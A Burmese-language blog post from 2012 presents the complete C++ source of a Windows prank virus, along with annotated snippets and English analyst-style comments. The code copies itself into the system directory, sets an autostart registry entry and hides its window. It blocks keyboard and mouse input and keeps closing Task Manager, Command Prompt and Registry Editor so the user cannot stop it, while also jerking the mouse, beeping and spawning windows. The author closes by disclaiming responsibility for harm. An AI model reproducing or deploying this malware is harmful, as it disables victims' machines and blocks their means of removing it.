
Thursday, September 20, 2012

တိုက္ခိုက္မႈ ၾကမ္းတဲ့Virus မ်ား


ဒါလည္း စမ္းလို႔ေကာင္းတဲ႔အမ်ိဳးအစားထဲမွာေတာ့ မပါ ပါဘူး။ သူရဲ႕တိုက္ခိုက္မႈက နည္းနည္းၾကမ္းတယ္ဗ်။ ဒီVirus ရဲ႕ Include header ဖိုင္ေတြကေတာ့ iostream,stdio,windows,winable,conio နဲ႔ ctime တို႔ျဖစ္ပါတယ္။
monitor ကို Turn off ျဖစ္သြားေအာင္ လုပ္ဖို႔အတြက္ ေအာက္က code ေတြကို အသံုးျပဳထားပါတယ္...



// Switches the display off. Despite the name, nothing in this function
// hibernates or suspends the machine.
// It waits one second, then broadcasts WM_SYSCOMMAND / SC_MONITORPOWER with
// lParam 2 (the documented "display is being shut off" value) to all
// top-level windows.
// Analyst note: the effect is a nuisance only; this function touches no files,
// registry keys or processes.
void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}


ေနာက္တခုက rand var's ႏွစ္ခုျပဳလုပ္ျပီး တိုက္ခိုက္ခံရသူရဲ႕ mouse ကို crazy ျဖစ္သြားေအာင္ လုပ္တာပါ။ အဲဒီ code ေတြကေတာ့....

// Moves the mouse pointer to a random screen position on each call.
// X and Y are not declared in this snippet; the full listing further down the
// page declares them as global ints.
void CrazyMouse()
{
// rand()%801 gives 0..800 and rand()%601 gives 0..600, so the pointer stays
// inside an 800x600 region whatever the real screen resolution is.
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}


ေနာက္တခုက open ခ်င္ရာေတြေလွ်ာက္ open ေနေအာင္ လုပ္တာပါ။ အဲဒါကို OpenStuff လို႔ေျပာၾကပါတယ္။ ေအာက္က code ေတြကိုၾကည့္ပါ။

// Launches four targets through the shell "open" verb, each requested maximized.
// Notepad, MineSweeper, Hearts and Website are not declared in this snippet;
// the full listing further down the page defines them as global char arrays.
// NOTE(review): the blanks inside the last argument on each line ("SW_MAXI MIZE",
// "SW_ MAXIMIZE", "SW_MAXIM IZE") look like page-formatting artifacts; the full
// listing on this page shows the same calls with SW_MAXIMIZE.
// Analyst note: one process repeatedly spawning these children in quick
// succession is an easy behavioural signal in process-creation logs.
void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXI MIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_ MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIM IZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXI MIZE);
}


ေအာက္မွာရွိတဲ႔ code ေတြကေတာ့ Find windows မွာ by name ေပးျပီး သူတို႔ကို ပ်က္စီးသြားေအာင္ ဖ်က္ဆီးျခင္း နဲ႔ windows title ေတြကို rename ေပးျပီး close သြားေအာင္ လုပ္တာပါ။ FindWindow command ေတြကို ပ်က္ျပယ္သြားေအာင္၊ မပ်က္ျပယ္ဘူး ဆိုရင္ေတာင္ command တခုေပးျပီး window ကို open ပါလိမ့္မယ္။ code ေတြကို ေလ့လာၾကည့္ပါ...

// Thread routine that keeps closing three administrative tools so the user
// cannot use them while the program runs.
// This excerpt is incomplete: it stops before the closing lines of the loop and
// of the function. The full listing further down the page shows the complete
// routine.
// TaskMgr, CMD and Regedit are HWND variables declared outside this snippet.
DWORD WINAPI DestroyWindows(LPVOID)
{
// Never exits: the lookups below are repeated for as long as the process lives.
while(1)
{
// Lookup is by exact window title only (class name is NULL), using these
// three literal titles.
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
// For each window found: overwrite its title text, then post WM_CLOSE to it.
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}


ေနာက္တစ္ခုကေတာ့ Windows စတက္လာတာနဲ႔ Virus ကို run ေနေစေအာင္registry ထဲမွာVirus ကို Add တဲ႔ code ေတြျဖစ္ပါတယ္...

// Autostart registration excerpt: opens a key under HKEY_LOCAL_MACHINE for
// writing and stores a REG_SZ value named "SetUp" in it.
// `system` is not declared in this snippet; in the full listing on this page it
// is a local char[MAX_PATH] buffer holding the path of the copied executable.
// NOTE(review): the blank inside "W indows" looks like a page-formatting
// artifact; the full listing shows the same path without it.
// Analyst notes:
//  - none of the three return codes is checked, so a failed open goes unnoticed
//    by the program itself;
//  - writing under HKEY_LOCAL_MACHINE normally needs administrative rights, so
//    running as a standard user limits this step;
//  - the value name "SetUp" and the key path exactly as written here are the
//    registry indicators to search for.
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\W indows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);


ေနာက္ဆံုးတစ္ခုကေတာ့ computerရဲ႕ beep ကို rand numbers ေတြအားျဖင့္ ကြဲျပားျခားနားတဲ႔ freq ေတြ lengths ေတြနဲ႔ ထြက္ေပၚေနေအာင္လုပ္တာပါ...

// Plays one tone of random pitch and length through Beep().
// Freq and Dur are not declared in this snippet; the full listing further down
// the page declares them as global ints.
void Beeper()
{
// Frequency argument is drawn from 0..2000, duration from 0..300 milliseconds.
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}


ဒီ Virus ရဲ႕ code အျပည့္အစံုကို ေအာက္မွာေဖာ္ျပေပးထားပါတယ္။ ေလ့လာၾကည့္ပါ...

#include <iostream>
#include <stdio.h>
#include <windows.h>
#include <winable.h>
#include <conio.h>
#include <ctime>
using namespace std;

// Global state shared by every function in the listing.
// random: behaviour selector picked once in main(); Freq/Dur: last tone passed
// to Beep(); X/Y: last cursor position passed to SetCursorPos().
int random, Freq, Dur, X, Y;
// mywindow: the program's own console window; the other three hold the handles
// looked up by the DestroyWindows thread.
HWND mywindow, TaskMgr, CMD, Regedit;
// Targets handed to ShellExecute by OpenStuff(): three program names and one
// URL string, each stored in a MAX_PATH-sized buffer.
char Notepad[MAX_PATH]="notepad.exe";
char MineSweeper[MAX_PATH]="winmine.exe";
char Hearts[MAX_PATH]="mshearts.exe";
char Website[MAX_PATH]="http:\\www.google.com";

// Forward declarations for the routines defined after main().
// SetUp: self-copy, autostart registry write and console hiding.
void SetUp();
// Run: dispatches to one behaviour according to the selector ID.
void Run( int ID );
// The four nuisance behaviours that Run() can call.
void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();

// Thread routine started from main(); closes Task Manager, Command Prompt and
// Registry Editor windows in a loop.
DWORD WINAPI DestroyWindows(LPVOID);

// Entry point. Order of operations, as an analyst reads it:
//   1. seed rand() with the current time and pick one selector in 0..5, once;
//   2. set the console title so SetUp() can later find and hide the window;
//   3. block keyboard and mouse input while SetUp() runs, then unblock it;
//   4. start the DestroyWindows thread;
//   5. call Run(random) forever, pausing 10 ms between calls.
// The function never returns, so the behaviour lasts until the process is
// terminated.
int main()
{
srand( time(0) );
// The selector is fixed for the life of the process: each run shows a single
// behaviour, or the combined `else` branch of Run() when the value is 0.
random = rand()%6;
system("title :.Virus.:");
// Responder note: per Microsoft's BlockInput documentation, input blocked this
// way is released when the user presses Ctrl+Alt+Del or the blocking thread exits.
BlockInput( true );
SetUp();
BlockInput( false );
// The thread handle returned by CreateThread is discarded and never closed.
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
while(1)
{
Run( random );
Sleep(10);
}
}
// Installation step: copies the running executable into the system directory,
// registers that copy in the registry, then hides the console window.
// No return value of any API call in this function is checked.
// Indicators visible in this code:
//  - a file named winminer.exe in the Windows system directory;
//  - a REG_SZ value named "SetUp" under the HKEY_LOCAL_MACHINE key path written below;
//  - a console window titled ":.Virus.:" (the title is set in main()).
// Mitigation note: both the system directory and HKEY_LOCAL_MACHINE normally
// require administrative rights to write, so a standard-user session limits
// this routine.
void SetUp()
{
// This local buffer shadows the C library function system() inside SetUp().
char system[MAX_PATH];
char pathtofile[MAX_PATH];
// Full path of the currently running executable.
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
// Destination path: <system directory>\winminer.exe.
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\winminer.exe");
// Third argument false means an existing file at the destination is overwritten.
CopyFile(pathtofile,system,false);

HKEY hKey;
// NOTE(review): the key path is reproduced exactly as the page gives it;
// confirm against a live sample which key is actually written.
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
// sizeof(system) is MAX_PATH, so the data length is always MAX_PATH bytes, not
// the length of the path string; bytes after the terminator are whatever the
// uninitialized buffer held. A fixed data length is a small forensic tell.
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);

// Finds the program's own console by the title main() assigned, prints a
// message, waits one second, then hides the window (false is 0, i.e. SW_HIDE).
// The process keeps running with no visible window afterwards.
mywindow = FindWindow(NULL,":.Virus.:");
cout<<"You Are Doomed cyberot";
Sleep(1000);
ShowWindow(mywindow, false);
}

// Dispatches to one behaviour according to ID.
//   1 -> block keyboard and mouse input
//   2 -> Beeper()
//   3 -> OpenStuff()
//   4 -> Hibernation()
//   5 -> CrazyMouse()
//   any other value -> block input, then Beeper(), OpenStuff() and CrazyMouse()
// main() passes a value in 0..5, so the final branch is reached when ID is 0.
// Nothing in this listing calls BlockInput(false) after the setup phase, so
// branches 1 and the final one leave input blocked.
void Run( int ID )
{
if( ID == 1 )
{
BlockInput(true);
}
else if( ID == 2 )
{
Beeper();
}
else if( ID == 3 )
{
OpenStuff();
}
else if( ID == 4 )
{
Hibernation();
}
else if( ID == 5 )
{
CrazyMouse();
}
else
{
BlockInput(true);
Beeper();
OpenStuff();
CrazyMouse();
}
}

// Plays one tone of random pitch and length through Beep().
// Writes the chosen values to the globals Freq and Dur.
void Beeper()
{
// Frequency argument is drawn from 0..2000, duration from 0..300 milliseconds.
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}
// Launches the four global targets (Notepad, MineSweeper, Hearts, Website)
// through the shell "open" verb, each requested maximized.
// main() calls Run() about every 10 ms, so when this branch is selected the
// desktop fills with new windows until the process is stopped.
// Analyst note: one parent process spawning the same children at this rate
// stands out in process-creation logs.
void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXIMIZE);
}
// Switches the display off. Despite the name, nothing in this function
// hibernates or suspends the machine.
// It waits one second, then broadcasts WM_SYSCOMMAND / SC_MONITORPOWER with
// lParam 2 (the documented "display is being shut off" value) to all
// top-level windows.
// Because main() calls Run() in an endless loop, selecting this branch repeats
// the broadcast roughly once per second.
void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}
// Moves the mouse pointer to a random screen position on each call and records
// the coordinates in the globals X and Y.
void CrazyMouse()
{
// rand()%801 gives 0..800 and rand()%601 gives 0..600, so the pointer stays
// inside an 800x600 region whatever the real screen resolution is.
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}

// Thread routine started from main(). It keeps closing three administrative
// tools, which stops the user from inspecting or ending the program with them.
// The LPVOID thread argument is unused, and the loop never exits, so the
// function never returns a value.
// Analyst notes:
//  - matching is by exact window title only (class name is NULL), using the
//    three literal titles below;
//  - a process that polls FindWindow for these titles every 10 ms and posts
//    WM_CLOSE to windows it does not own is a strong behavioural signal.
DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
// For each window found: overwrite its title text, then post WM_CLOSE to it.
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}

// Short pause between passes; the three lookups repeat about every 10 ms.
Sleep(10);
}
}  
 ၾကိဳေျပာထားတယ္မယ္ေနာ္  စမ္းလို႔ေကာင္းမယ့္virusေတြထဲမွာ တား  ေရးတဲ့virusေတြမပါဘူး

တစ္ခုခုျဖစ္ရင္တားတားမပါဘူးေနာ္
